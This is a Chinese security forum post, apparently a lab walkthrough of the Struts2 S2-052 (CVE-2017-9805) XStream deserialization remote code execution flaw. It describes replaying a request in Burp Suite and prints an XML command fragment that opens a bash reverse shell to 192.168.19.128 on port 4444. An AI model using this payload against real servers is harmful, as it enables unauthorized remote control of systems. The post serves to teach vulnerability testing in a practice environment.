安全矩阵

 找回密码
 立即注册
搜索
查看: 1217|回复: 0

struts2-052 远程代码执行 (CVE-2017-9805)

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-10-13 17:52:15 | 显示全部楼层 |阅读模式
。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行严格的过滤导致远程代码执行。
打开靶场
抓包
在burpsuite中改包进行重放,payload如下。
上面的数据包中执行命令的地方在这里:
执行的是创建shell.txt文件的命令,但我们需要的是获取flag,于是修改pyload,改成反弹shell的命令:在远程命令执行过程中,由于务器不识别&这个符号,需要编码,将&换成 &,如下所示
<command>
<string>bash</string>
<string>-c</string>
<string>bash -i >& /dev/tcp/192.168.19.128/4444 0>&1</string>
</command>

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-8 12:20 , Processed in 0.012169 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表